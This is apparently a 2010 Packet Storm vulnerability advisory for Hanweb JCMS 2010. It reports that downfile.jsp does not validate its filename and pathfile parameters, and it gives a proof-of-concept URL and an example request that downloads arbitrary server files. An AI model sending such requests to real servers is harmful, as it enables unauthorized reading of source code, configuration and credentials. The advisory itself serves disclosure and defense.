JCMS 2010 File Download

2010-11-22T00:00:00
ID PACKETSTORM:96058
Type packetstorm
Reporter Beach
Modified 2010-11-22T00:00:00

Description

                                        
                                            `#####################################################################################################  
#Title: JCMS 2010 File Download Vulnerability  
#Date: 2010-11-22  
#Author: Beach  
#Team: http://www.linux520.com/  
#Vendor: http://www.hanweb.com/  
#Language:Java  
#Greetz: Brother  
#####################################################################################################  
[*]Description:  
  
In /module/download/downfile.jsp ,filename and pathfile didn't verify user's input  
So this vulnerability allows an attacker to download any files .  
#####################################################################################################  
[*]POC:  
  
http://server/module/download/downfile.jsp?filename=[file_name]&pathfile=[Path/Path/file_name]  
#####################################################################################################  
[*]I.E:  
  
http://server/module/download/downfile.jsp?filename=downfile.jsp&pathfile=module/download/downfile.jsp  
#####################################################################################################  
  
`